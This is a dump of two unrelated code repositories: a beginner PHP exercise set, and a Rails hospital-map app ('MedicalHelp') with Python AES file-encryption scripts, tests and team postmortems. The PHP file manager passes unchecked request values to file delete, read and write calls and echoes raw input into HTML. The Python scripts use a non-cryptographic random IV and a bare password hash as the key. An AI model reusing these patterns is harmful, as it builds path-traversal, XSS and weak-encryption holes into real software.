$arr["somearray"] [13]; echo $arr["somearray"] ["a"]; echo "<br>"; echo"<pre>"; print_r($arr = array("some" => array(5 => 12, 23, 45, 69, "b" => 41))) ; echo 
$arr["some"] [5]; echo $arr["some"] ["a"]; "</pre>" ?> <?php $arr = array(5 => 1, 12 => 2); $arr[] = 56; print_r($arr); $arr["x"] = 42; print_r($arr); unset($arr[5]); unset($arr); echo "<br>"; class foo { function do_foo() { echo "Doing foo."; } } $bar = new foo; $bar ->do_foo(); ?> <!-- if --> <?php if ($a > $b) { echo "a больше, чем b"; $b = $a; } echo "<br>"; // else if ($a > $b) { echo "a is greater than b"; } else { echo "a is NOT greater than b"; } echo "<br>"; // Альтернативный синтаксис if ($a == 5): echo "a equals 5"; echo "..."; elseif ($a == 6): echo "a equals 6"; echo "!!!"; else: echo "a is neither 5 nor 6"; endif; ?> </body> </html><file_sep>/time/sec.php <?php $time_start = microtime(1); for ($i=0; $i < 1000; $i++){ } $time_end = microtime(1); $time = $time_end - $time_start; echo "Ничего не делал $time секунд\n"; ?><file_sep>/downloader/del.php <?php unlink('file/'. $_GET['file']); header("Location: file2.php"); ?><file_sep>/colorbox/box.php <<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> <link rel="stylesheet" href="box.css"> </head> <body> <div class="colbox" style="width: <?= $_GET['a']?>px; height: <?= $_GET['b']?>px; background-color: <?= $_GET['color']?>"></div> <?php // print_r($_GET); $first = $_GET['a']; $second = $_GET['b']; $area = $_GET['a'] * $_GET['b']; echo " Площадь прямоугольника = $area ." ; ?> </body> </html><file_sep>/downloader/file2.php <?php $arr = scandir("file"); for ($i = 2; $i < count($arr); $i++) { switch (explode(".", $arr[$i])[1]) { case 'docx'; $icon = 'docx-file-14-504256.png'; break; case 'pdf'; $icon = 'adobe-pdf-icon.png'; break; default: $icon = 'images.png'; break; } $filesize = round(((filesize("file\\$arr[$i]")) / 1024) / 1024, 3) . 
"Mb"; echo "<a href='file\\$arr[$i]'><img src='$icon' width='26' height='26'>$arr[$i]</a> <a href='del.php?file=$arr[$i]'><img src='cross.png' width='32' height='32'></a> <a href='textarea.php?file=$arr[$i]'><img src='edit.png' width='26' height='26'></a> <a href='rename.php?file=$arr[$i]'><img src='pan.png' width='20'></a> <a href='view.php?file=$arr[$i]'><img src='glaz.png' width='20'></a> $filesize <br>"; } <file_sep>/downloader/ren.php <?php rename ('file//'.$_POST['oldname'],'file//'.$_POST['name']); header("Location: file2.php"); ?><file_sep>/file.ini [first] one = 1 five = 5 [second] path = /usr/local/bin<file_sep>/dz5.2.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php $f = fopen("count.dat", "r"); $count = fgets($f); $count = $count + 1; echo $count; fclose($f); $c = fopen("count.dat","w+"); fwrite($c,$count); ?> </body> </html><file_sep>/2header/1header7.php <?php print_r($_SERVER); ?> <a href="?name=Vasya">ggg</a> <a href="?hello">hello</a><file_sep>/downloader/file/dz5.2.php Document</title> </head> <body> <?php $f = fopen("count.dat", "r"); $count = fgets($f); $count = $count + 1; echo $count; fclose($f); $c = fopen("count.dat","w+"); fwrite($c,$count); ?> </body> </html>>><file_sep>/opros/opros2.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php $ind = $_POST['op']; $arr = file('opros.csv'); $opr = explode(" - ",$arr[$ind]); $opr[1]+=1; $arr[$ind] = implode(" - ", $opr)."\n"; file_put_contents('opros.csv', $arr); foreach($arr as $value){ echo "$value<br>"; } $s = 0; for ($i=1; $i <count($arr); $i++) { $s = $s + explode(" - ", $arr[$i])[1]; } echo $s; for ($i=1; $i <count($arr); $i++) { 
$buf = explode(" - ", $arr[$i]); echo $buff[0] . " - " ($buf[1] / $sum * 100). "<br>"; } ?> </body> </html><file_sep>/2header/1header6.php <?php print_r($_GET); ?> <a href="?name=Vasya">ggg</a> <a href="?hello">hello</a><file_sep>/function2.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php $array = array(144444, 2, 3232, 4456, 5355); function takes_array($array) { $max = $array[0]; for ($i = 1; $i < count($array); $i++) { if ($array[$i] > $max) { $max = $array[$i]; } } return $max; } echo takes_array($array) ?> </body> </html><file_sep>/downloader/fileedit.php <?php file_put_contents('file/'. $_POST['oldname'], $_POST['name']); header("Location: file2.php"); ?><file_sep>/README.md # first * d;gd;g * fgdgdf * adfsf * qq *курсив* **еще курсив** ~~зачеркнул~~ 9. список 1. второй список # FFFF ## ghgh ### fgfgd #### ghghf <blockquote> цитата </blockquote> [ссылочка](https://ru.wikipedia.org/wiki/Markdown) Первая колонка | Вторая колонка ------ | ------ тут текст | <file_sep>/wrk5.6.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php $a = 'кушать'; echo mb_strtoupper($a); echo "<br>"; $a = 'кушать'; echo mb_strtolower($a); echo "<br>"; $b = 'kyshats'; echo str_shuffle($b); ?> </body> </html><file_sep>/downloader/textarea.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document</title> </head> <body> <form action="fileedit.php" method="POST"> <textarea name="name" cols="30" rows="10" ><?= htmlspecialchars(file_get_contents('file//'. 
$_GET['file'])) ?></textarea> <input type="hidden" name="oldname" value="<?=$_GET['file']?>"><br> <input type="submit" value="Save"> </form> <form action="back.php "> <input type="submit" value="Back"> </form> </body> </html><file_sep>/table.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php $array = array( 1 => 'Иванов', 2 => 'Петров', 3 => 'Сидоров', ) ?> </body> </html><file_sep>/work17.01.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <!-- Передача аргументов по ссылке --> <?php function plus(&$string){ $string .= ' + Петя'; } $str = 'Ира'; plus($str); echo $str; echo "<br>"; ?> <!-- Исползование значиний по умолчанию в определении функции --> <?php function makecoffee($type = "cappuccino"){ return "Making a cup of $type. \n"; } echo makecoffee(); echo "<br>"; echo makecoffee("espresso"); echo "<br>"; ?> <!-- Област видимости переменной --> <?php $a = 1; function Test(){ echo $a; } Test(); ?> <!-- Область видимости переменной --> <?php $a = 1; $b = 2; function Sum(){ global $a, $b; $b = $a + $b; } Sum(); echo $b; echo "<br>"; ?> <!-- Статические переменные --> <?php function Test2(){ static $a = 0; echo $a; $a++; } Test2 (5); echo $a; ?> </body> </html><file_sep>/function.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php // $makefoo = true; // bar (); // if ($makefoo) { // function foo () // { // echo "I don't exist program execution reaches me. 
\n"; // } // } // if ($makefoo) foo(); // function bar() // { // echo "I exiat immediately upon program start.\n"; // } //Вложенные функции // function foo () // { // function bar() // { // echo "I don't exist until foo() is called.\n"; // } // } // foo(); // bar(); //Передача массива в функцию // $input = array(5, 1); // function takes_array($input) // { // echo '$input[0] + $input[1] =', // $input[0]+$input[1]; // } // takes_array($input); // $input = array(5, 1); // function takes_array($input) // { // echo '$input[0] + $input[1] =', // ($input[0]+$input[1]) * 2; // } // takes_array($input); //Массив умноженный на 2 // function takes_array($input) // { // echo '$input[0] + $input[1] =', // $input[0]+$input[1]; // } // takes_array(array(5, 7)); // function mul($arr) // { // for ($i = 0; $i < count($arr); $i++){ // $arr[$i] = $arr[$i] * 2; // } // return $arr; // } // print_r(mul ([1, 2, 3])); //выбрать большее число $a = 584; $b = 8544; $g = 445; $f = 55; function numb($a, $b, $g, $f){ if ($a > $b) { $c = $a; } else { $c = $b; } if ($c < $g){ $c = $g; } if($f > $g){ $c = $f; } return $c; } echo numb($a,$b,$g,$f); ?> </body> </html><file_sep>/downloader/file/less190219.php <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title></title> </head> <body> Введите текст <br> <form action='ip.php' metod='post'> <textarea rows="25" cols="100" name="n"><?php echo (isset($_POST['n'])) ? 
$_POST['n'] : 'Введите текст';?></textarea> <input type="submit" name="result"><br> </form> </body> </html><file_sep>/2header/1header5.php <?php if (!headers_sent()) { header('Location: http://www.tut.by'); exit; } ?>ddd<file_sep>/downloader/back.php <?php header("Location: file2.php"); ?><file_sep>/dz5.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php $f=fopen("count.dat","a+"); $count=fgets($f); $count++; ftruncate($f,0); fwrite($f,$count); fclose($f); echo $count; ?> </body> </html><file_sep>/time/getdate.php <?php $today = getdate(); echo $today['month']; echo '<br>'; echo $today['weekday']; echo '<br>'; ?> <?php $week = ['Monday' => 'Понедельник', 'Tuesday' => 'Вторник', 'Wednesday' => 'Среда', 'Thursday' => 'Четверг', 'Friday' => 'Пятница', 'Saturday' => 'Суббота', 'Sunday' => 'Воскресенье']; $dat =getdate(); echo $week [$dat['weekday']]; echo '<br>'; ?> <?php echo $today = date("F j, Y, g:i a"); // March 10, 2001, 5:16 pm echo '<br>'; echo $today = date("m.d.y"); // 03.10.01 echo '<br>'; echo $today = date("j, n, Y"); // 10, 3, 2001 echo '<br>'; echo $today = date("Ymd"); // 20010310 echo '<br>'; echo $today = date('h-i-s, j-m-y, it is w Day'); // 05-16-18, 10-03-01, 1631 1618 6 Satpm01 echo '<br>'; echo $today = date('\i\t \i\s \t\h\e jS \d\a\y.'); // it is the 10th day. 
echo '<br>'; echo $today = date("D M j G:i:s T Y"); // Sat Mar 10 17:16:18 MST 2001 echo '<br>'; echo $today = date('H:m:s \m \i\s\ \m\o\n\t\h'); // 17:03:18 m is month echo '<br>'; echo $today = date("H:i:s"); // 17:16:18 ?> <?php echo '<br>'; echo date("M-d-Y",mktime(21,00,00,02,14,2020)); ?><file_sep>/time/first.php <?php echo time(); echo '<br>'; ?> <?php echo microtime(0); ?><file_sep>/downloader/file/ip (1).php <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title></title> </head> <body> Введите адрес страницы или сайта <br> <form action='ip.php' metod='post'> <input type="text" name="n"></inhut><br> <input type="submit" name="result"><br> </form> </body> </html> <?php $str=file_get_contents($_POST['n']); preg_match("/<body>(.*)<\/body>/ius",$str,$arr); $str=$arr[1]; $pat='/<.*?>/'; $rep="$1"; $str2=preg_replace($pat,$rep,$str); echo htmlentities($str2); ?>
45d5fb64d99499453424222e698ce8804a5983be
[ "Markdown", "PHP", "INI" ]
31
PHP
Yaroslav-Ivanov/first
6f3e1b9005d48812249dbb7b6632061f544a4ca7
4cd69f03aca8fe703fa51e03da140966ab52ddb8
refs/heads/master
<file_sep>import os, random, struct from Crypto.Cipher import AES import hashlib import getpass class DecryptDataPrompt(): ''' Prompt: 1. Get the filepath via prompt or drag/drop 2. (Optional) Get the output name 3. (Optional) Delete the initial file ''' def __init__(self): print('File to decrypt: ') while(True): try: f_name = raw_input('> ').strip() if(f_name == ''): # Enter key continue continue elif(os.path.isfile(f_name)): # Valid file path print("Valid path: %s" % f_name) self.f_name = f_name break else: # Invalid file path print("Invalid path: %s" % f_name) except KeyboardInterrupt: print " Decryption Cancelled" return print('Output file name, n for filename - .enc') while(True): try: output_name = raw_input('> ').strip() if(output_name == ''): # Enter key continue continue elif(output_name == 'n'): self.output_name = None break else: # Custom output name file_dir = os.path.dirname(self.f_name) output = os.path.join(file_dir, output_name) self.output_name = output print("Output as: %s" % output) break except KeyboardInterrupt: print " Decryption Cancelled" return print('Delete encoded file? 
(y/n)') while(True): try: del_resp = raw_input('> ').strip() if(del_resp == ''): # Enter key continue continue elif(del_resp == 'y'): # Delete the initial file self.del_resp = str(del_resp) break elif(del_resp == 'n'): # Do not delete initial file self.del_resp = str(del_resp) break else: # Invalid response print('Invalid Response') continue except KeyboardInterrupt: print " Decryption Cancelled" return print('Password: ') while(True): try: password = getpass.getpass('> ').strip() if(password == ''): # Enter key continue continue else: print('File decryption started') #decryptor = AES.new(key, mode, IV=IV) #plain = decryptor.decrypt(ciphertext) key = hashlib.sha256(password).digest() self.decrypt_file(key, self.f_name, self.output_name) # Delete the file if requested if(self.del_resp == 'y'): print ('Deleting encoded file') os.remove(self.f_name) print('File decryption complete') return except KeyboardInterrupt: print " Decryption Cancelled" return def decrypt_file(self, key, in_filename, out_filename=None, chunksize=24*1024): """ Decrypts a file using AES (CBC mode) with the given key. Parameters are similar to encrypt_file, with one difference: out_filename, if not supplied will be in_filename without its last extension (i.e. if in_filename is 'aaa.zip.enc' then out_filename will be 'aaa.zip') """ if not out_filename: out_filename = os.path.splitext(in_filename)[0] with open(in_filename, 'rb') as infile: origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0] iv = infile.read(16) decryptor = AES.new(key, AES.MODE_CBC, iv) with open(out_filename, 'wb') as outfile: while True: chunk = infile.read(chunksize) if len(chunk) == 0: break outfile.write(decryptor.decrypt(chunk)) outfile.truncate(origsize) if __name__ == '__main__': DecryptDataPrompt() <file_sep>import os, random, struct from Crypto.Cipher import AES import hashlib import getpass class EncryptDataPrompt(): ''' Prompt: 1. Get the filepath via prompt or drag/drop 2. 
(Optional) Get the output name 3. (Optional) Delete the initial file ''' def __init__(self): print('File to encrypt: ') while(True): try: f_name = raw_input('> ').strip() if(f_name == ''): # Enter key continue continue elif(os.path.isfile(f_name)): # Valid file path print("Valid path: %s" % f_name) self.f_name = f_name break else: # Invalid file path print("Invalid path: %s" % f_name) except KeyboardInterrupt: print " Encryption Cancelled" return print('Output file name, n for filename.enc') while(True): try: output_name = raw_input('> ').strip() if(output_name == ''): # Enter key continue continue elif(output_name == 'n'): self.output_name = None break else: # Custom output name file_dir = os.path.dirname(self.f_name) output = os.path.join(file_dir, output_name) self.output_name = output print("Output as: %s" % output) break except KeyboardInterrupt: print " Encryption Cancelled" return print('Delete initial file? (y/n)') while(True): try: del_resp = raw_input('> ').strip() if(del_resp == ''): # Enter key continue continue elif(del_resp == 'y'): # Delete the initial file self.del_resp = str(del_resp) break elif(del_resp == 'n'): # Do not delete initial file self.del_resp = str(del_resp) break else: # Invalid response print('Invalid Response') continue except KeyboardInterrupt: print " Encryption Cancelled" return print('Encryption password: ') while(True): try: password = getpass.getpass('> ').strip() if(password == ''): # Enter key continue continue else: # Double check password print('Please retype the password: ') retyped_password = getpass.getpass('> ').strip() # Encrypt if passwords match if(password == retyped_password): print('Passwords match') print('File encryption started') key = hashlib.sha256(password).digest() self.encrypt_file(key, self.f_name, self.output_name) # Delete the file if requested if(self.del_resp == 'y'): print ('Deleting initial file') os.remove(self.f_name) print('File encryption complete') return else: print('Passwords do not match') 
print('Encryption password: ') continue except KeyboardInterrupt: print " Encryption Cancelled" return def encrypt_file(self, key, in_filename, out_filename=None, chunksize=64*1024): """ Encrypts a file using AES (CBC mode) with the given key. key: The encryption key - a string that must be either 16, 24 or 32 bytes long. Longer keys are more secure. in_filename: Name of the input file out_filename: If None, '<in_filename>.enc' will be used. chunksize: Sets the size of the chunk which the function uses to read and encrypt the file. Larger chunk sizes can be faster for some files and machines. chunksize must be divisible by 16. """ if not out_filename: out_filename = in_filename + '.enc' iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16)) encryptor = AES.new(key, AES.MODE_CBC, iv) filesize = os.path.getsize(in_filename) with open(in_filename, 'rb') as infile: with open(out_filename, 'wb') as outfile: outfile.write(struct.pack('<Q', filesize)) outfile.write(iv) while True: chunk = infile.read(chunksize) if len(chunk) == 0: break elif len(chunk) % 16 != 0: chunk += ' ' * (16 - len(chunk) % 16) outfile.write(encryptor.encrypt(chunk)) if __name__ == '__main__': EncryptDataPrompt() <file_sep># PyCrypto-example Quickly encrypt and decrypt files test To run the encryption prompt ``` python encrypt.py ``` To run the decryption prompt ``` python decrypt.py ```
b66ce79b53f873d1756e7a54f65dfed3949090e3
[ "Markdown", "Python" ]
3
Python
lostAstronaut/PyCrypto-example
ad6937ab7552aab5f7a4a79d8e0abe3f29544373
4cd85ec3c8fa5a19e161008374397b505adeee68
refs/heads/master
<file_sep># Postmortem (Iteração 3)- MedicalHelp Período: 24/10 - 6/11 ## O que estava planejado? * Fazer layout dos marcadores - <NAME> * Adicionar latitudes e longitudes com geocoding - <NAME> * Atualizar banco de dados com latitudes e longitudes - <NAME> * Adicionar marcadores nos hospitais - Guilherme Menge e <NAME> * Ajustes necessários no front end - Guilherme Menge * Testes para localização e marcadores gmaps - <NAME> * Testes rspec marcadores mapa - Mateus Maciel * Modelo ER - <NAME> e <NAME> ## O que foi feito? * Fazer layout dos marcadores - <NAME> * Adicionar latitudes e longitudes com geocoding - <NAME> * Atualizar banco de dados com latitudes e longitudes - <NAME> * Adicionar marcadores nos hospitais - Guilherme Menge e Mateus Maciel * Ajustes necessários no front end - Guilherme Menge * Testes para localização e marcadores gmaps - <NAME> * Testes rspec marcadores mapa - <NAME> * Modelo ER - <NAME> e <NAME> ## O que não foi feito? ## O que está planejado para a próxima iteração? * Adicionar layout dos marcadores na aplicação - Guilherme Menge * Ajustes necessários no front end - Guilherme Menge * Screencast - <NAME> * Teste para filtro de hospitais - <NAME> * Filtrar hospitais pelo tipo - <NAME> * Procurar alternativas para geolocalização mais precisa - <NAME> ## Lições aprendidas * Lembrar de associar todos os commits a uma issue * Separar branches para cada desenvolvedor <file_sep>Given("I am on the home page") do visit "/" end When("click on the buscar button") do click_button("Buscar") end Then("I should see the map on a new page") do visit "/map" end <file_sep># This file should contain all the record creation needed to seed the database with its default values. # The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup). 
# # Examples: # # movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }]) # Character.create(name: 'Luke', movie: movies.first) require 'smarter_csv' require 'database_cleaner' DatabaseCleaner.clean_with(:truncation) filename = '/home/mateus/periodo4/es/planilhas/_tbEstabelecimento201707.csv' options = {:key_mapping => {:unwanted_row => nil, :old_row_name => :new_name}} n = SmarterCSV.process(filename, options) do |array| puts array.first # we're passing a block in, to process each resulting hash / =row (the block takes array of hashes) # when chunking is not enabled, there is only one hash in each array Hospital.create( array.first ) end <file_sep>And ("there are clinics near me") do expect(page).to have_xpath "//script[contains(., icon.consult_u)]", visible: false end Then("I should see a pin on the map on every clinic location") do expect(page).to have_xpath "//script[contains(., icon.consult_u)]", visible: false end And ("there are not clinics near me") do expect(page).not_to have_xpath "//script[contains(., icon.consult_u)]" end Then("I should not see a clinic pin on the map") do expect(page).not_to have_xpath "//script[contains(., icon.consult_u)]" end <file_sep>And ("there are general hospitals near me") do expect(page).to have_xpath "//script[contains(., icon.geral_u)]", visible: false end Then("I should see a pin on the map on every general hospital location") do expect(page).to have_xpath "//script[contains(., icon.geral_u)]", visible: false end And ("there are not general hospitals near me") do expect(page).not_to have_xpath "//script[contains(., icon.geral_u)]" end Then("I should not see a general hospital pin on the map") do expect(page).not_to have_xpath "//script[contains(., icon.geral_u)]" end <file_sep>## Ata de Reunião | Data | Local | | - | - | | 05/09/2017 | CIn - UFPE | ### Participantes | Participante | Função | | - | - | | <NAME> | Desenvolvedor | | <NAME> | Product Owner e Desenvolvedora| | <NAME> | Desenvolvedora | | 
<NAME> | Gerente do projeto e Desenvolvedor| ### Objetivos - Definir escopo do projeto - Estabelecer funcionalidades ### Tarefas - Pesquisar e escolher a melhor API para mapas. (Mateus) - Criar as histórias do usuário. (Coletivo) - Criação de mockups e elementos visuais (Maria Eugênia) ### Tópicos Discutidos 1. Funcionalidades * Retornar o hospital mais próximo com base no serviço procurado * Retornar o hospital mais próximo com base na disponibilidade de um plano de saúde pelo usuário. 2. Funcionalidades essenciais * Ser responsivo * Ser intuitivo * Design deve ser leve, de maneira a carregar instantaneamente aos olhos do usuário e poupando o pacote de dados do mesmo. 3. Funcionalidades essenciais - MVP (Mínimo Produto Viável) * Aplicação que retorna o hospital (público ou privado) mais próximo com base apenas na localização. <file_sep>Given("I am on the mappage") do visit "/map" end Then("I should see a pin on the map") do expect(page).to have_xpath "//script[contains(., marker)]", visible: false end <file_sep># Postmortem (Iteração 2)- MedicalHelp Período: 10/10 - 23/10 ## O que estava planejado? * Configurar PostgreSQL - Mateus Maciel * Popular banco de dados - <NAME> * Filtrar no controller hospitais em Recife - <NAME> * Criar testes para features e funções do gmaps - <NAME> * Retirar rotas desnecessárias (criadas no scaffold) - <NAME> * Criar tabela e colunas no banco de dados - <NAME> * Front end da tela inicial - Guilherme Menge ## O que foi feito? * Configurar PostgreSQL - Mateus Maciel * Testes rspec para rotas e views - Mateus Maciel * Popular banco de dados - <NAME> * Filtrar no controller hospitais em Recife - <NAME> * Criar testes para features e funções do gmaps - <NAME> * Retirar rotas desnecessárias (criadas no scaffold) - <NAME> * Criar tabela e colunas no banco de dados - <NAME> * Front end da tela inicial - Guilherme Menge * Front end para tela do mapa - Guilherme Menge * Atualização das HUs - <NAME> ## O que não foi feito? 
* Teste rspec model ## O que está planejado para a próxima iteração? * Fazer layout dos marcadores - <NAME> * Adicionar latitudes e longitudes com geocoding - Mariana Lima * Atualizar banco de dados com latitudes e longitudes - Mariana Lima * Adicionar marcadores nos hospitais - Guilherme Menge e Mateus Maciel * Ajustes necessários no front end - Guilherme Menge * Testes para localização e marcadores gmaps - <NAME> * Testes rspec marcadores mapa - Mate<NAME> * Modelo ER - <NAME> e <NAME> ## Lições aprendidas * Não acumular atividades * Utilizar melhor as branches <file_sep>Rails.application.routes.draw do get '' => 'hospitals#busca_hospitais' get '/map' => 'hospitals#showmap' end <file_sep>json.partial! "hospitals/hospital", hospital: @hospital <file_sep>require "rails_helper" RSpec.describe HospitalsController, type: :routing do describe "routing" do it "routes to #busca_hospitais" do expect(:get => "/").to route_to("hospitals#busca_hospitais") end it "routes to #showmap" do expect(:get => "/map").to route_to("hospitals#showmap") end end describe "routing to invalid urls" do it "routes to #new" do expect(:get => "/new").not_to be_routable end it "routes to #show" do expect(:get => "/1").not_to be_routable end it "routes to #edit" do expect(:get => "/1/edit").not_to be_routable end end describe "routing to invalid actions" do it "routes to POST method" do expect(:post => "/").not_to be_routable end it "routes to PUT method" do expect(:put => "/").not_to be_routable end it "routes to DELETE method" do expect(:delete => "/").not_to be_routable end end end <file_sep>require 'rails_helper' RSpec.describe "hospitals/showmap", type: :view do before :each do assign(:centrossaude, [Hospital.create(nu_latitude: 1, nu_longitude: 2)]) assign(:consultorios, [Hospital.create(nu_latitude: 1, nu_longitude: 2)]) assign(:clinicas, [Hospital.create(nu_latitude: 1, nu_longitude: 2)]) assign(:hospgerais, [Hospital.create(nu_latitude: 1, nu_longitude: 2)]) assign(:hospespecializados, 
[Hospital.create(nu_latitude: 1, nu_longitude: 2)]) render end it 'shows voltar button' do expect(rendered).to have_selector ("#back") end it 'shows the logo' do expect(rendered).to have_selector ("#logo") end it 'shows the map' do expect(rendered).to have_selector ("#map") end end <file_sep># Postmortem (Iteração 0)- MedicalHelp Período: 07/08 - 25/09 ## O que estava planejado? * Reuniões com o cliente - Todos * Definir o tema e os papéis dentro do time - Todos * Descrição do Projeto - Todos * Artefatos visuais - <NAME> * HU’s - Todos * Se aprofundar mais na linguagem Ruby - Todos ## O que foi feito? * Reuniões com o cliente - Todos * Definir o tema e os papéis dentro do time - Todos * Descrição do Projeto - Todos * Artefatos visuais - <NAME> * HU’s - Todos ## O que não foi feito? * Se aprofundar mais na linguagem Ruby (Todos). Muita demanda das outras disciplinas, acabou fazendo com que essa atividade fosse escanteada. ## O que está planejado para a próxima iteração? * Novas reuniões com o cliente - Todos * Separação das funcionalidades que devem ser implementadas e qual dos membros ficarão responsáveis por cada uma - Mateus (GP) * Iniciar desenvolvimento de algumas histórias de usuário - Todos * Iniciar desenvolvimento de testes iniciais - Todos ## Lições aprendidas * Continuar distribuindo bem as atividades antes do período de entrega para não entregar nada mal feito e nas pressas. * Importância da união do grupo e do alinhamento. * Saber o que cada um está fazendo, para não deixar ninguém sobrecarregado. 
<file_sep>Given("I have allowed access to my GPS location") do expect(page).to have_xpath "//script[contains(., navigator.geolocation)]", visible: false end Then("the center of the map should be approximately on my current location") do expect(page).to have_xpath "//script[contains(., getCurrentPosition)]", visible: false end Given("I have not allowed access to my GPS location") do expect(page).to have_xpath "//script[contains(., handleLocationError)]", visible: false end Then("the center of the map should be approximately on the default location") do expect(page).to have_xpath "//script[contains(., map.setCenter)]", visible: false end <file_sep># Postmortem (Iteração 4)- MedicalHelp Período: 06/11 - 27/11 ## O que estava planejado? * Adicionar layout dos marcadores na aplicação - <NAME> * Ajustes necessários no front end - <NAME> * Screencast - <NAME> * Teste para filtro de hospitais - <NAME> * Filtrar hospitais pelo tipo - <NAME> * Procurar alternativas para geolocalização mais precisa - <NAME> ## O que foi feito? * Adicionar layout dos marcadores na aplicação - <NAME> * Ajustes necessários no front end - <NAME> * Screencast - <NAME> * Teste para filtro de hospitais - <NAME> * Filtrar hospitais pelo tipo - <NAME> * Procurar alternativas para geolocalização mais precisa - <NAME> * Design dos marcadores - <NAME> ## O que não foi feito? ## Lições aprendidas * Saber a produtividade da equipe para planejar as atividades de uma iteração * Importância do gerenciamento de mudanças <file_sep>Given("I am on the map page") do visit "/map" end When("click on the voltar button") do click_button("Voltar") end Then("I should go back to the homepage") do visit "/" end <file_sep>require 'rails_helper' RSpec.describe "hospitals/busca_hospitais", type: :view do before :each do render end it 'shows a button' do expect(rendered).to have_selector ("#search") end it 'shows the logo' do expect(rendered).to have_selector ("#logo") end end <file_sep>json.extract! 
hospital, :id, :created_at, :updated_at json.url hospital_url(hospital, format: :json) <file_sep>class Hospitals < ActiveRecord::Migration[5.1] def change change_table :hospitals do |t| t.string :co_unidade t.string :co_cnes t.string :nu_cnpj_mantenedora t.string :tp_pfpj t.string :nivel_dep t.string :no_razao_social t.string :no_fantasia t.string :no_logradouro t.string :nu_endereco t.string :no_complemento t.string :no_bairro t.string :co_cep t.string :co_regiao_saude t.string :co_micro_regiao t.string :co_distrito_sanitario t.string :co_distrito_administrativo t.string :nu_telefone t.string :nu_fax t.string :no_email t.string :nu_cpf t.string :nu_cnpj t.string :co_atividade t.string :co_clientela t.string :nu_alvara t.timestamp :dt_expedicao t.string :tp_orgao_expedidor t.timestamp :dt_val_lic_sani t.string :tp_lic_sani t.string :tp_unidade t.string :co_turno_atendimento t.string :co_estado_gestor t.string :co_municipio_gestor t.string :dt_atualizacao t.string :co_usuario t.string :co_cpfdiretorcln t.string :reg_diretorcln t.string :st_adesao_filantrop t.string :co_motivo_desab t.string :no_url t.float :nu_latitude t.float :nu_longitude t.string :dt_atu_geo t.string :no_usuario_geo t.string :co_natureza_jur t.string :tp_estab_sempre_aberto t.string :st_geracredito_gerente_sgif t.string :st_conexao_internet t.string :co_tipo_unidade t.string :no_fantasia_abrev t.string :tp_gestao t.date :dt_atualizacao_origem end end end <file_sep>class HospitalsController < ApplicationController before_action :set_hospital, only: [:show, :edit, :update, :destroy] # GET /hospitals # GET /hospitals.json def index @hospitals = Hospital.where("co_municipio_gestor = '261160'") end def busca_hospitais @hospitals = Hospital.where("co_municipio_gestor = '261160'") end def showmap @centrossaude = Hospital.where(["co_municipio_gestor = ? and tp_unidade = ?", "261160", "2"]) @consultorios = Hospital.where(["co_municipio_gestor = ? 
and tp_unidade = ?", "261160", "22"]) @clinicas = Hospital.where(["co_municipio_gestor = ? and tp_unidade = ?", "261160", "36"]) @hospgerais = Hospital.where(["co_municipio_gestor = ? and tp_unidade = ?", "261160", "5"]) @hospespecializados = Hospital.where(["co_municipio_gestor = ? and tp_unidade = ?", "261160", "7"]) end # GET /hospitals/1 # GET /hospitals/1.json def show end # GET /hospitals/new def new @hospital = Hospital.new end # GET /hospitals/1/edit def edit end # POST /hospitals # POST /hospitals.json def create @hospital = Hospital.new(hospital_params) respond_to do |format| if @hospital.save format.html { redirect_to @hospital, notice: 'Hospital was successfully created.' } format.json { render :show, status: :created, location: @hospital } else format.html { render :new } format.json { render json: @hospital.errors, status: :unprocessable_entity } end end end # PATCH/PUT /hospitals/1 # PATCH/PUT /hospitals/1.json def update respond_to do |format| if @hospital.update(hospital_params) format.html { redirect_to @hospital, notice: 'Hospital was successfully updated.' } format.json { render :show, status: :ok, location: @hospital } else format.html { render :edit } format.json { render json: @hospital.errors, status: :unprocessable_entity } end end end # DELETE /hospitals/1 # DELETE /hospitals/1.json def destroy @hospital.destroy respond_to do |format| format.html { redirect_to hospitals_url, notice: 'Hospital was successfully destroyed.' } format.json { head :no_content } end end private # Use callbacks to share common setup or constraints between actions. def set_hospital @hospital = Hospital.find(params[:id]) end # Never 